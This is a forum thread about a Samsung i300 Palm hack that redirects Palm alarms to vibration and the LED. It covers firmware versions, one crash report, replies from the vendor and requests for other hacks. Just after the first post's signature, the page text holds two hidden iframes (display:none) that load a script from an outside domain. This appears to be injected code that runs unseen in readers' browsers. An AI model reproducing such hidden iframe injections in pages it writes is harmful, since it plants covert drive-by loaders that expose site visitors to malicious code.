+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Smile Available now: I300 Hack for vibrating alert from Palm

There is now a I300 X-Master hack that allows the Palm part of the phone to vibrate and blink the LED. The hack is called I300VibraBlinkHack and can be downloaded from

http://www.pdaapps.com/

They have a free trial; I've tried it with datebook and it works great. All Palm alarms are re-directed to whatever ringtone you
    set in the phone for "Page Alerts", and you can control the volume of both the Phone and the Palm using the volume slider-- very convenient. Like "Page Alerts", alarms don't vibrate at max volume + vibrate, but do so when the volume is set to "vibrate".
    They say the hack works with ActionNames Datebook also.

The only caveat is that this hack only works with software version UJ12, but I think most of us have this version.

Enjoy

--Gaurav<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have version UI06 (I received my i300 very early). Is there any way to update our software version.

Is this something Sprint or Samsung will do? Anyone update the SW version yet?

I have UI06 also.... boy does that suck. Does anyone know what the differences are between the versions?
    Carl

I ripped a ROM of the UI06 to PDA Apps this morning & they said they would develop the hack for this version if it is possible. Cross your fingers.

Maybe a dumb question, but where do you find your version number?

Thanks, Mark

Phone app/menu/options/version

Thanks, if the phone portion would turn on I would check it, trying to avoid a hard reset.

Mark

I tried this out and and got some bad results. When I checked my phone about 10 minutes after an alarm should have gone off I found it locked up with the screen on. I did a soft reset and all seemed fine. About a hour later when I looked at my phone again, I was greeted with the Welcome app. At some point in that hour my phone performed a hard reset and its memory was wiped. I've unchecked the hack now and I'm afraid to try it again.

sammyterry,
    What is the version of the phone software on your phone? Are you using HackMaster? This product will work well with X-Master. HackMaster has a few known bugs which might be causing the crash.
    -PDAapps Team

They created a version for UI06. I installed it and my initial tests are successfull. The vibrate/LED go off as expected.

I used x-master for the hack utility.

I will try it for a week and see if my i300 remains stable (I have had zero crashes since dumping MultiMail). My i300 has been incredibly stable (which you would expect from a phone/pda).

Version UI06 also supported now

We have updated the software so that it supports versions:

S:I300.01.S.UJ12
    (PDA: 0110:1200)

or

s:I300.01.S.UI06
    (PDA : 0108:2800)

Thanks for your interest,
    -PDAapps.com Team

PDAapps team,

Since you seem to have some experience developing hacks for the i300, I suggest you capitalize on this and use this forum to determine say the top 5 requested hacks. I think you will find a very receptive audience here.

My number #1: When a message/missed-call/page/fax is received, flash the red LED repeatedly or periodically, and optionally sound an alarm or vibrate. Basically, make it work like a "normal" phone.

In my opinion, this is was a gross error of omittance by the software team.

Thanks!

This update has been posted on the PDAapps.com website.

It works with X-Master. Some people have reported issues with TealMaster, and we are investigating those issues.

Thanks,
    -PDAapps.com Team

Hack ideas:

* sprint logo replacement
    * turn on the backlight on the top lcd when regular lcd is on. (I'm constantly finding myself looking for the duration of my call when talking @night - but can never see it...)
    * blink/keep on red light if voicemail/new phone call/etc

-mark

Originally posted by abward
    PDAapps team,

Since you seem to have some experience developing hacks for the i300, I suggest you capitalize on this and use this forum to determine say the top 5 requested hacks. I think you will find a very receptive audience here.

My number #1: When a message/missed-call/page/fax is received, flash the red LED repeatedly or periodically, and optionally sound an alarm or vibrate. Basically, make it work like a "normal" phone.

In my opinion, this is was a gross error of omittance by the software team.

Thanks!
    Ditto,Ditto,Ditto!!!
    Carl

SDK?

PDAapps --

I tried out the hack and it works great. It's the first I300 specific application I've seen.

Just curious about your development process. Have you been able to find an SDK?

Originally posted by PDAapps
    sammyterry,
    What is the version of the phone software on your phone? Are you using HackMaster? This product will work well with X-Master. HackMaster has a few known bugs which might be causing the crash.
    -PDAapps Team
    I have version UJ12. I had Hackmaster installed but when I installed your hack I also installed X-Master and deleted Hackmaster after the the Hotsync.

Oh, I'm also using Datebk4, perhaps the conflict lies their.

Smile

SammyTerry,
    Thanks for your patience. We have not tested the hack with DataBk4 but will do so shortly and will make changes as necessary and get the hack to work.
    PDAapps

This hack is not free. The demo version only works for 5 days. Maybe i am stating the totally obvious. Pdaapps wants $10 for this functionallity when samsung should have included it in the first place. This new feature is nice, but i don't need it that bad.